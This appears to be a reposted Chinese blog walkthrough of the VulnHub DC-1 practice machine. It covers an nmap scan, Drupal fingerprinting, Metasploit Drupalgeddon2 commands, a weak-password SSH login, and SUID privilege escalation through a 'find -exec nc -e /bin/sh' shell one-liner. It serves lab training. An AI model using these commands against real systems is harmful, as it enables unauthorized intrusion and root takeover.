VulnHub之dc1靶场(3)

其他 2021-03-22 03:00:15 阅读次数: 0 
靶场信息:

地址:https://www.vulnhub.com/entry/dc-1-1,292/
难度:简单
目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志
运行:vm work

信息收集

nmap直接扫描网段存活主机
在这里插入图片描述
扫描常见端口

nmap  10.7.10.29  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST
Nmap scan report for 10.7.10.29
Host is up (0.0021s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds

爆破弱口令,访问网页,扫描目录
在这里插入图片描述
收集指纹:

中间件:apache 2.2.22
语言:php 5.4.45
cms:drupal 7

漏洞复现

信息泄露

http://10.7.10.29/robots.txt在这里插入图片描述

远程代码执行漏洞

search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 10.7.10.29
run

我msf老是返回这个,呜呜呜
在这里插入图片描述

弱口令

回去查看爆破内容
在这里插入图片描述
直接登陆ssh在这里插入图片描述
登陆成功,但是/root目录没有权限
在这里插入图片描述

suid提权

尝试找到具有root权限的suid
在这里插入图片描述
发现为root可以利用
在这里插入图片描述
执行成功
在这里插入图片描述
首先执行find flag4.txt -exec nc -lvp 9999 -e /bin/sh \;
反弹shell到我的linux上
在这里插入图片描述
反弹成功,跳到root目录下在这里插入图片描述
参考文章:
https://blog.csdn.net/adminuil/article/details/101269264
https://blog.csdn.net/weixin_40860777/article/details/105118966

suid提权:https://blog.csdn.net/qq_36119192/article/details/84872644

猜你喜欢

转载自blog.csdn.net/p_utao/article/details/113867390
DC1
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
周排行
循环神经网络(rnn)讲解
Tigao教程四:单独的关节运动
金蝶K3WISE15.0-注册套打教程
如何在Mac上配置Kubernetes
Android应用结束自身进程的方法
SpringMVC学习 十三 拦截器栈
中国驻洛杉矶总领馆举行新春招待会
HttpClient get post 发送
11 - three.js 笔记 - 绘制三维字体模型
Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点
每日归档
更多
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022